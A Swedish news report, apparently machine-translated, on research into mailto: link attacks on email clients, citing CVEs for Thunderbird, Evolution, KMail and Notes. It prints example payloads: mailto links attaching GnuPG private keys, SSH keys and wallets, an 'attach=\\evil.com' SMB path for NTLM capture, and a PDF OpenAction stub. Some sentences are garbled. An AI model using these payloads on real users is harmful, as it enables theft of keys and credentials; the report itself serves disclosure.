Forskare från Ruhr University Bochum (Tyskland) () beteende hos e-postklienter vid bearbetning av "mailto:"-länkar med avancerade parametrar. Fem av de tjugo e-postklienter som undersöktes var sårbara för en attack som manipulerade resursersättning med hjälp av parametern "attach". Ytterligare sex e-postklienter var sårbara för en PGP- och S/MIME-nyckelersättningsattack, och tre klienter var sårbara för en attack för att extrahera innehållet i krypterade meddelanden.
Länkar «"används för att automatisera öppningen av en e-postklient för att skriva ett brev till adressaten som anges i länken. Utöver adressen kan du ange ytterligare parametrar som en del av länken, såsom ämnet för brevet och en mall för typiskt innehåll. Den föreslagna attacken manipulerar parametern "attach", som gör att du kan bifoga en bilaga till det genererade meddelandet.
Mailklienter Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) och Pegasus Mail var sårbara för en trivial attack som låter dig bifoga automatiskt någon lokal fil, specificerad via en länk som "mailto:?attach=path_to_file". Filen bifogas utan att visa en varning, så utan särskild uppmärksamhet kanske användaren inte märker att brevet kommer att skickas med en bilaga.
Använd till exempel en länk som "mailto:[e-postskyddad]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" kan du infoga privata nycklar från GnuPG i brevet. Du kan också skicka innehållet i kryptoplånböcker (~/.bitcoin/wallet.dat), SSH-nycklar (~/.ssh/id_rsa) och alla filer som är tillgängliga för användaren. Dessutom låter Thunderbird dig bifoga grupper av filer genom att använda konstruktioner som "attach=/tmp/*.txt".
Förutom lokala filer bearbetar vissa e-postklienter länkar till nätverkslagring och sökvägar i IMAP-servern. IBM Notes låter dig framför allt överföra en fil från en nätverkskatalog när du bearbetar länkar som "attach=\\evil.com\dummyfile", samt avlyssna NTLM-autentiseringsparametrar genom att skicka en länk till en SMB-server som kontrolleras av angriparen (förfrågan kommer att skickas med den aktuella användaren för autentiseringsparametrar).
Thunderbird bearbetar framgångsrikt förfrågningar som "attach=imap:///fetch>UID>/INBOX>1/", som låter dig bifoga innehåll från mappar på IMAP-servern. Samtidigt dekrypteras meddelanden som hämtas från IMAP, krypterade via OpenPGP och S/MIME, automatiskt av e-postklienten innan de skickas. Utvecklarna av Thunderbird var om problemet i februari och i numret problemet har redan åtgärdats (Thunderbird grenar 52, 60 och 68 är fortfarande sårbara).
Gamla versioner av Thunderbird var också sårbara för två andra attackvarianter på PGP och S/MIME föreslagna av forskarna. Speciellt Thunderbird, såväl som OutLook, PostBox, eM Client, MailMate och R2Mail2, var föremål för en nyckelersättningsattack, orsakad av det faktum att e-postklienten automatiskt importerar och installerar nya certifikat som överförs i S/MIME-meddelanden, vilket möjliggör angriparen att organisera ersättning av publika nycklar som redan lagrats av användaren.
Den andra attacken, som Thunderbird, PostBox och MailMate är mottagliga för, manipulerar funktionerna i mekanismen för att automatiskt spara utkastmeddelanden och tillåter, med hjälp av mailto-parametrar, att initiera dekrypteringen av krypterade meddelanden eller tillägget av en digital signatur för godtyckliga meddelanden, med efterföljande överföring av resultatet till angriparens IMAP-server. I denna attack sänds chiffertexten via parametern "body" och taggen "meta refresh" används för att initiera ett anrop till angriparens IMAP-server. Till exempel: ' '
För att automatiskt bearbeta "mailto:"-länkar utan användarinteraktion kan specialdesignade PDF-dokument användas - OpenAction-åtgärden i PDF låter dig automatiskt starta mailto-hanteraren när du öppnar ett dokument:
%PDF-1.5
1 0 obj
<< /Typ /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Typ /Action /S /URI/URI (mailto:?body=——BEGIN PGP MEDDELANDE——[…])>>
endobj
Källa: opennet.ru